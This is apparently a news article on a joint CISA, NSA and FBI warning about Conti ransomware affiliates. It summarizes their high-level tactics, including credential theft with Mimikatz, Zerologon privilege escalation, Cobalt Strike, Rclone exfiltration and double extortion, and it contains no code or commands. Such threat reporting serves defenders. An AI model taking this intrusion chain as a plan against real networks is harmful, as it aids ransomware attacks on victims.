The Conti ransomware operators have been a menace for more than a year, with attacks against health care providers, 911 systems, and many other critical organizations being connected to Conti affiliates in the last few months. Although the group’s internal playbook leaked online a few weeks ago, Conti attacks have not slowed down and the FBI, CISA. and NSA are warning enterprises that the threat from the group continues.
Conti is one of the many ransomware-as-a-service (RaaS) operations that have sprouted up in recent years, and its affiliates have shown a willingness to target virtually any type of organization. Earlier this year, a Conti affiliate compromised Ireland’s Health Service Executive, taking down much of the service’s infrastructure and forcing the cancellation of appointments and massive care delays. The Irish police later seized some Conti infrastructure, but like most RaaS groups, it has a distributed operation that was not completely disrupted by the action.
On Wednesday, the three top federal government agencies that handle cybersecurity issues published a warning about the continued threat from the Conti operation, saying that they have seen more than 400 Conti attacks recently. Conti affiliates use a variety of techniques for gaining initial access to target networks, including phishing campaigns, stolen credentials, or installation through other malware families. Once inside a network, the actors often use legitimate tools for lateral movement and network inventory.
“Conti actors are known to exploit legitimate remote monitoring and management software and remote desktop software as backdoors to maintain persistence on victim networks. The actors use tools already available on the victim network—and, as needed, add additional tools, such as Windows Sysinternals and Mimikatz—to obtain users’ hashes and clear-text credentials, which enable the actors to escalate privileges within a domain and perform other post-exploitation and lateral movement tasks. In some cases, the actors also use TrickBot malware to carry out post-exploitation tasks,” the advisory from CISA, NSA, and FBI says.
The Conti playbook that appeared online a few weeks ago includes quite a bit of detail about the affiliates’ responsibilities, tools to use, and how to find administrator access once they’re on a new network. A translation of the playbook from Russian to English performed by Cisco Talos researchers reveals that the group has a variety of tools and techniques at its disposal.
“Conti actors are known to exploit legitimate remote monitoring and management software and remote desktop software as backdoors."
“The adversaries also included instructions on CVE-2020-1472 Zerologon exploitation in Cobalt Strike. In a previous Ryuk ransomware engagement from Q2 2021, we observed the adversary access several additional resources within that environment and employ a privilege escalation exploit leveraging CVE-2020-1472 to impersonate a domain controller,” Talos researchers said.
“Talos first started observing Ryuk adversaries using the Zerologon privilege-escalation vulnerability in September 2020 and continued updating their attacks on the health care and public health sectors in October. Some researchers have described Conti as the successor to Ryuk.”
Conti affiliates also use publicly available legitimate tools in their operations, including Cobalt Strike and others.
“Conti actors often use the open-source Rclone command line program for data exfiltration. After the actors steal and encrypt the victim's sensitive data, they employ a double extortion technique in which they demand the victim pay a ransom for the release of the encrypted data and threaten the victim with public release of the data if the ransom is not paid,” the advisory says.